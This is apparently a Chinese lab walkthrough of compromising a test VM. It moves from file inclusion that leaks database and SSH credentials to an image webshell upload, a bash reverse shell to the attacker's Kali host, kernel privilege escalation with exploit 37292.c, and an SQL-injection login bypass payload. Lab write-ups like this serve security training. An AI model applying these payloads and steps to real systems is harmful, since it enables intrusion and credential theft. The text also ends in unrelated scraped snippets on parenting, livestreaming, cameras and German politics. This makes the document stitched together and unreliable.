使用nmap或netdiscover扫描确定其ip
访问其80端口
发现是一个登入界面,使用御剑后台扫描工具和kali的dirb扫描网站目录
御剑扫描结果:
dirb扫描结果:
现在收集到的信息有:
http://192.168.220.143/add.php文件上传
http://192.168.220.143/in/? ? phpinfo()
http://192.168.220.143/phpmyphpMyAdmin
http://192.168.220.143/test文件包含
访问192.168.220.143/test.php使用brup抓包
将请求 *** 改为post
在Params中加参数file和对应的内容
单包发送,得到对应文件的内容
证明该页面存在文件包含漏洞,查看c.php(猜测可能是配置文件)
得到数据库连接用户名密码,在phpMyAdmin页面使用用户名密码登入
成功登入,得到登入web界面的用户名密码
成功登入web界面
选择添加用户,发现可以上传文件,开始上传一句话图片木马
访问http://192.168.220.143/panel.php?1=phpinfo(); 使用brup抓包,修改load参数为图片地址
发现成功显示了phpinfo() ,说明可以反弹shell
使用brup的编码模块对echo 'bash -i >& /dev/tcp/192.168.220.146/4444 0>&1' | bash进行url编码
注意:ip是kali的ip,端口是监听的端口,要写单引号
在kali中开启监听
使用burp构造payload,点击Go访问
注意:url编码的代码要加到system("");里
成功反弹shell
查看那个目录有写权限,打算写一个一句话木马
进入uploaded_images目录,写木马
拿到webshell,查看系统和内核版本
使用kali的searchsploit命令搜索提权代码,使用37292.c提权,下载文件到kali
然后拷贝到真机,绕后通过菜刀上传到目标机器
编译提权文件
执行编译后的执行文件,成功提权到root权限
爆破phpmy目录下的文件
使用文件包含漏洞,查看config.inc.php文件内容
可以看到账号密码,直接使用此账号密码ssh连接目标主机,拿到root权限
使用文件包含漏洞查看index.php源码,分析其过滤规则,然后构造payload绕过
最后测试出uname=or 1=1#? pass=\? ? 能成功登入
加 \ 号是为了让后面的unmae逃逸出来,使用此payload的后的sql语句:
select * from auth where pass='\' and uname=' or 1=1#'
如今的社会,宅男宅女是越来越多,不仅数主动宅在家里,还有很多宝妈,他们因为孩子,不得不被迫离开职场,每天在家里带娃,收拾屋子,也有很多人空闲时间很多,想让自己生活充实起来,不出去工作,吃什么、喝什么、...
文|淘妈 前段时间新进了一个妈妈群,这天看到几位新手妈妈在讨论产后例假来的时间。有的妈妈说她坐完月子后就来了,当时还以为是恶露没有排干净,专门去医院检查,结果医生说是例假来了,真的是很尴尬。而有的妈...
网上找的黑客是真的假的相关问题 世界女黑客排名相关问题 黑客是什么意 电脑突然被别人远程了(电脑怎么让别人远程)...
父亲突然问我,啥是直播,他想知道直播是怎么赚钱的,因为他看到有一个做直播的,一年赚了好几十万,挺诱惑人的。 我不知道该怎么回答他,就简单的给他说了一句直播就是用手机在网上卖东西,因为有很多人买,所以...
监控摄像头必须要有网络吗? 摄像头需要网络。如果是网络摄像头就需要WiFi网络。一般的监控摄像头不需要WiFi网络的。如果是普通的录像。需要录像用摄像机和加录像机硬盘,线材即可, 不需要录像,光摄像机...
新华社柏林1月14日电 (国际观察)德国执政党选举 谁能成默克尔接班人 新华社记者任珂 张远 德国执政党基督教民主联盟(基民盟)全国党代会将于15日至16日在线上召开,最重要的议程是选...